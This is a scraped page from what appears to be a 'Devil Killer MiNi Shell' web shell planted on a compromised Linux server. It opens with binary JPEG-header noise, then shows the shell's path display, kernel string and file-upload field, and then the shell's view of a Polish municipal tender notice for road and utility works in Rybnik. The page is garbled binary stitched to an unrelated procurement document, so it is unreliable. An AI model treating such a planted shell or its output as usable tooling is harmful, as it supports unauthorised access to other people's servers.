JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240711/0040937901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa układu drogowego na strefie gospodarczej w rejonie ul. Sportowej w Rybniku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO RYBNIK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255430</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bolesława Chrobrego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">324392302</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam_pub@um.rybnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rybnik.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Wodociągów i Kanalizacji w Rybniku Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">642-26-64-990</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pod Lasem 62</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 43 28 000</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pwik@pwik-rybnik.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pwik-rybnik.pl/</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">Zamawiający 1 - udzielenie zamówienia i finansowanie części zamówienia<br/>Zamawiający 2 - finansowanie części zamówienia</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa układu drogowego na strefie gospodarczej w rejonie ul. Sportowej w Rybniku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-23b4baa8-2f15-11ef-86d2-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00409379</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00577643/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.24 Budowa układu drogowego w strefie przemysłowej w rejonie ul. Sportowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-23b4baa8-2f15-11ef-86d2-4e696a6d8c25 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. <br/>2.	Korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>3.	Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia): https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-23b4baa8-2f15-11ef-86d2-4e696a6d8c25 <br/>Postępowanie można wyszukać również ze strony głównej Platformy <br/>e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”). <br/>4.	Identyfikator (ID) postępowania na Platformie e-Zamówienia: ocds-148610-23b4baa8-2f15-11ef-86d2-4e696a6d8c25</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie eZamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy eZamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>3. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>5. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik), lub<br/>2) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>6. Komunikacja w postępowaniu, z wyłączeniem składania ofert o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce &#34;Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”).<br/>7. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>8. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>10. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>11. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: zam_pub@um.rybnik.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w rozdziale I SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w rozdziale I SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.46.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 24809975,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 11304879,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Nazwa zadania: Budowa układu drogowego na strefie gospodarczej w rejonie <br/>ul. Sportowej w Rybniku.<br/>2.	Opis przedmiotu zamówienia i wymagania związane z realizacją zamówienia:<br/>ETAP I:<br/>Część drogowa<br/>Jezdnia<br/>	wykopy ziemne, drogowe 5188,96 m3 <br/>	warstwa wzmacniająca – geosiatka 8399,83 m2 <br/>	wypełnienie materaca warstwa o gr. 50 cm 3478,80 m2 <br/>	podbudowa pomocnicza warstwa o gr. 20 cm 3478,80 m2 <br/>	podbudowa zasadnicza warstwa o gr. 20 cm 3478,80 m2 <br/>	krawężniki betonowe wtopione o wym. 12x25 cm, 184,0 m<br/>	krawężniki betonowe najazdowe o wym. 15x22 cm, 711,00 m<br/>	podbudowa z betonu asfaltowego AC 22P o gr. 10 cm 3145,60 m2 <br/>	nawierzchnia z warstwy wiążącej AC 16 W o gr. 6 cm 3145,60 m2<br/>	warstwa ścieralna SMA 11 o gr. 4 cm 3145,60 m2<br/>Chodnik<br/>	warstwa odsączająca o gr. 15 cm 568,00 m2 <br/>	podbudowa zasadnicza warstwa o gr. 15 cm 568,00 m2 <br/>	nawierzchnia z kostki bet o gr. 8 cm na podsypce cem-piask 568,00 m2<br/>	obrzeża betonowe o wym. 30x8 cm, 292,00 m<br/>	oznakowanie poziome grubowarstwowe 161,60 m2<br/> <br/>Część kanalizacyjna<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø200, SN 12 98,00 m<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø315, SN 12 147,50 m<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø400, SN 12 276,50 m<br/>	studzienki szczelne żelbetowe DN 1200mm 13,0 stud.<br/>	wpust deszczowy z osadnikiem DN 500 mm 15,0 szt.<br/>Część teletechniczna<br/>Budowa kanału technologicznego<br/>	budowa studni kablowych SKR-2 3,00 szt. <br/>	budowa rurociągu kablowego KTu 230,30 m. <br/>	budowa rurociągu kablowego KTp 24,30 m. <br/>Część elektryczna<br/>Budowa oświetlenia ulicznego<br/>	montaż szafy oświetleniowej 1,00 kpl.<br/>	stawianie słupów oświetleniowych h= 8m 9,00 szt.<br/>	montaż wysięgników jednoramiennych 9,00 szt.<br/>	układanie kabla YAKY 4x35 699,00 m<br/>	montaż opraw LED 65 W 9,00 szt.<br/>ETAP II:<br/>Część drogowa<br/>Jezdnia<br/>	wykopy ziemne, drogowe 3992,05 m3 <br/>	warstwa wzmacniająca – geosiatka 8215,63 m2 <br/>	wypełnienie materaca warstwa o gr. 50 cm 3287,50 m2 <br/>	podbudowa pomocnicza warstwa o gr. 20 cm 3287,50 m2 <br/>	podbudowa zasadnicza warstwa o gr. 20 cm 3287,50 m2 <br/>	krawężniki betonowe najazdowe o wym. 15x22 cm, 758,00 m<br/>	podbudowa z betonu asfaltowego AC 22P o gr. 10 cm 2930,00 m2 <br/>	nawierzchnia z warstwy wiążącej AC 16 W o gr. 6 cm 2930,00 m2<br/>	warstwa ścieralna SMA 11 o gr. 4 cm 2930,00 m2<br/>Chodnik<br/>	warstwa odsączająca o gr. 15 cm 626,00 m2 <br/>	podbudowa zasadnicza warstwa o gr. 15 cm 626,00 m2 <br/>	nawierzchnia z kostki bet o gr. 8 cm na podsypce cem-piask 626,00 m2<br/>	obrzeża betonowe o wym. 30x8 cm, 315,00 m<br/>	oznakowanie poziome grubowarstwowe 28,20 m2<br/>Zbiornik<br/>	wykopy ziemne, drogowe 2940,00 m3 <br/>	wzmocnienie pow. skarp – geowłóknina separacyjna 4905,80 m3 <br/>	wzmocnienie pow. skarp – geokrata 4649,20 m3 <br/>	umocnienie skarpy wylotu kanalizacji deszcz. 91,20 m3 <br/>	prefabrykowany wlot 1,00 szt <br/>	wciskanie ścianek szczelnych 418,00 m <br/>Część kanalizacyjna<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø200, SN 12 104,50 m<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø250, SN 12 17,00 m<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø400, SN 12 346,00 m<br/>	studzienki szczelne żelbetowe DN 1200mm 12,0 stud.<br/>	wpust deszczowy z osadnikiem DN 500 mm 14,0 szt.<br/>Część teletechniczna<br/>Budowa kanału technologicznego<br/>	budowa studni kablowych SKR-2 6,00 szt. <br/>	budowa rurociągu kablowego KTu 310,00 m. <br/>	budowa rurociągu kablowego KTp 22,60 m. <br/>Część elektryczna<br/>Budowa oświetlenia ulicznego Etap II i III<br/>	stawianie słupów oświetleniowych h= 8m 18,00 szt.<br/>	montaż wysięgników jednoramiennych 18,00 szt.<br/>	układanie kabla YAKY 4x35 689,00 m<br/>	montaż opraw LED 65 W 18,00 szt.<br/>ETAP III:<br/>Część drogowa<br/>Jezdnia<br/>	wykopy ziemne, drogowe 3044,60 m3 <br/>	warstwa wzmacniająca – geosiatka 5516,23 m2 <br/>	wypełnienie materaca warstwa o gr. 50 cm 2243,00 m2 <br/>	podbudowa pomocnicza warstwa o gr. 20 cm 2243,00 m2 <br/>	podbudowa zasadnicza warstwa o gr. 20 cm 2243,00 m2 <br/>	krawężniki betonowe najazdowe o wym. 15x22 cm, 487,00 m<br/>	podbudowa z betonu asfaltowego AC 22P o gr. 10 cm 2015,50 m2 <br/>	nawierzchnia z warstwy wiążącej AC 16 W o gr. 6 cm 2015,50 m2<br/>	warstwa ścieralna SMA 11 o gr. 4 cm 2015,50 m2<br/>Chodnik<br/>	warstwa odsączająca o gr. 15 cm 415,00 m2 <br/>	podbudowa zasadnicza warstwa o gr. 15 cm 415,00 m2 <br/>	nawierzchnia z kostki bet o gr. 8 cm na podsypce cem-piask 415,00 m2<br/>	obrzeża betonowe o wym. 30x8 cm, 207,50 m<br/>	oznakowanie poziome grubowarstwowe 14,50 m2<br/>Część kanalizacyjna<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø200, SN 12 50,50 m<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø250, SN 12 284,00 m<br/>	studzienki szczelne żelbetowe DN 1200mm 8,0 stud.<br/>	wpust deszczowy z osadnikiem DN 500 mm 8,0 szt.<br/>Część teletechniczna<br/>Budowa kanału technologicznego<br/>	budowa studni kablowych SKR-2 4,00 szt. <br/>	budowa rurociągu kablowego KTu 195,60 m. <br/>Budowa sieci kanalizacji sanitarnej ETAP I – w ciągu ulicy Przyjemnej, Sportowej i I etapu układu drogowego na strefie gospodarczej<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø200, SN 8 515,50 m<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø250, SN 8 242,50 m<br/>	studzienki szczelne żelbetowe DN 1200mm 27,0 stud.<br/>Budowa sieci wodociągowej ETAP I – w ciągu ulicy Przyjemnej, Sportowej i I etapu układu drogowego na strefie gospodarczej<br/>	montaż rurociągów z rur polietylenowych Ø125 665,50 m<br/>	przewiert sterowany horyzontalny o śr. 125 mm 405,00 m<br/>	przewiert sterowalny - rura stalową o śr. 200 mm 13,00 m<br/>	przeciąganie rurociągów przewodowych PEHD Ø125 13,00 m<br/>	hydranty pożarowe nadziemne o śr. 80 mm 6,00 kpl<br/>Budowa sieci kanalizacji sanitarnej ETAP II –w ciągu etapu II i III układu drogowego na strefie gospodarczej<br/>	rury kanalizacyjne z PVC-U, WK, lite Ø200, SN 8 488,00 m<br/>	studzienki szczelne żelbetowe DN 1200mm 15,0 stud.<br/>Budowa sieci wodociągowej ETAP II –w ciągu etapu II i III układu drogowego na strefie gospodarczej<br/>	montaż rurociągów z rur polietylenowych Ø125 459,00 m<br/>	Hydranty pożarowe nadziemne o śr. 80 mm 3,00 kpl<br/>Szczegółowy zakres precyzuje SWZ wraz z załącznikami </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">460 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został określony w SWZ w rozdziale XXIV</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji robót budowlanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 	Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwie (2) roboty budowlane o wartości minimum 6 500 000 zł brutto oraz każda z nich polegająca na budowie, rozbudowie lub przebudowie drogi publicznej o nawierzchni mineralno-bitumicznej w zakresie:<br/>	kanalizacji deszczowej,<br/>	oświetlenia ulicznego.<br/>	Wykonawca spełni warunek jeżeli wykaże, że skieruje do realizacji zamówienia:<br/>	osobę, która będzie pełniła funkcję kierownika budowy posiadającą uprawnienia budowlane bez ograniczeń w specjalności drogowej upoważniające do wykonywania samodzielnej funkcji kierownika budowy, oraz posiadającą doświadczenie zawodowe w zakresie kierowania minimum dwoma robotami budowlanymi każda <br/>o wartości minimum 6 500 000 zł brutto oraz każda polegająca na budowie, przebudowie lub rozbudowie ulicy lub drogi 